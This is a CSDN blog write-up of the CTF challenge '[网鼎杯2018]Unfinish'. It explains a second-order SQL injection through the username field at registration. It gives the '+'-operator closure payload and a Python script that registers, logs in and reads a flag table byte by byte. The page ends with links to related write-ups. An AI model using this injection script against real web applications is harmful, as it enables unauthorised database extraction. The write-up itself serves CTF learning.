Buu - [网鼎杯2018]Unfinish

最新推荐文章于 2024-08-05 17:02:59 发布
最新推荐文章于 2024-08-05 17:02:59 发布
阅读量273 收藏 5
点赞数 4
分类专栏: CTF-Web 文章标签: web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79839194/article/details/138850403
版权

知识点:

  • 二次注入
  • 注释符不能用 => 利用数据库的+运算符 进行闭合

分析:

初始页面是login登录页面,万能密码不管用,想着肯定会有注册页面的

-> url/register.php => 有回显,可以注册账号

-> 注册完进来之后没有什么信息,能观察的就是左边有自己的用户名

在这里插入图片描述

流程:注册账号 -> 登录进来 -> 回显的是用户名

解析:注册账号,将信息放在数据库中,登录进来比对数据库,将对应用户名拿出来回显在页面中

=> 二次注入

题解:

注入点在注册页面的用户名处,测试过滤了什么 => 单引号 语句后面跟注释符也被过滤

但同时,如果是 1’ or ‘1’='1 又能成功注册,这是肯定是单引号闭合,但是因为不能在后面跟注释符,如何进行闭合

数据库中+的运用

在这里插入图片描述

闭合语句:0' + ascii(substr((select * from flag) from {} fro 1)) + '0

import requests
from bs4 import BeautifulSoup
import time

url = "http://387acb5b-091a-45f6-9bd3-ca3c685a8741.node5.buuoj.cn:81/"

m = ''

for i in range(100):
    payload = "0' + ascii(substr((select * from flag) from {} fro 1)) + '0".format(i+1)
    register_data = {
        'email':'abc{}@qq.com'.format(i),
        'username':payload,
        'password':'123456'
    }
    login_data = {
        'email':'abc{}@qq.com'.format(i),
        'password':'123456'
    }

    req = requests.session()
    url1 = url + 'register.php' # 注册页面
    url2 = url + 'login.php' # 登录页面
    url3 = url + 'index.php' # 回显页面
    res1 = req.post(url=url1, data=register_data)
    res2 = req.post(url=url2, data=login_data)
    res3 = req.post(url=url3)

    html = res3.text
    # print(html)
    soup = BeautifulSoup(html, 'html.parser')
    # print(soup.prettify())
    UserName = soup.span.string
    print(UserName)
    if int(UserName) == 0:
        break
    m += chr(int(UserName))
    print(m)
    time.sleep(1)

参考:

csdn的WP

学习python中beautifulsoup的使用

Liqd
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 291
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1733
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
BUUCTF:[网鼎杯 2018]Fakebook
末初的CSDN博客
11-06 2015
题目地址:https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202018]Fakebook 查看robots.txt,发现user.php.bak 下载user.php.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct(.
3.16---网鼎杯2020青龙组----signal----vm逆向
qq_73505302的博客
03-16 645
3.16
BUU刷题记-网鼎杯专栏2
Kanyun的博客
07-23 876
网站目录扫描.git文件泄露GitHacker文件使用addslashes()、二次注入漏洞gbk编码导致的宽字节注入漏洞。
buu-[网鼎杯 2020 半决赛]AliceWebsite
qaq517384的博客
10-25 336
打开环境,更换页面时有个action 嗯,朴实无华,没有过滤的文件包含,真好
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1113
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
BUU-[网鼎杯 2020 青龙组]AreUSerialz
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
03-11 3639
分析一下他给的代码: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $c.
[网鼎杯2018]Unfinish&&CTFSHOW内部赛签到题
Je3Z的博客
07-15 1602
CTFSHOW那个是根据[网鼎杯2018]Unfinish改编的,有个源码泄露友好些吧,然后过滤的东西不一样,然后感觉不错就总结下 然后扫目录的时候有源码泄露www.zip,下载后读下代码 user.php <?php include('db.php'); session_start(); error_reporting(0); if($_SESSION['u']){ $username=$_SESSION['u']; if (is_numeric($username)) { if(strl
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 641
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
最新发布
goldfish8848的博客
08-05 481
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
等保测评与网络安全应急响应机制建设:构建坚实的安全防线
A526847的博客
08-05 231
等保测评与网络安全应急响应机制建设是企业网络安全防护的两大支柱。企业应高度重视这两项工作,将其纳入日常管理中,形成常态化的风险管理机制。只有这样,才能确保在数字化时代中稳健前行,为业务的持续发展和创新提供有力保障。
网络安全中的IOC是指的什么?
Nove1205的博客
08-02 384
一分钟让你了解网络安全中的IOC是什么
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值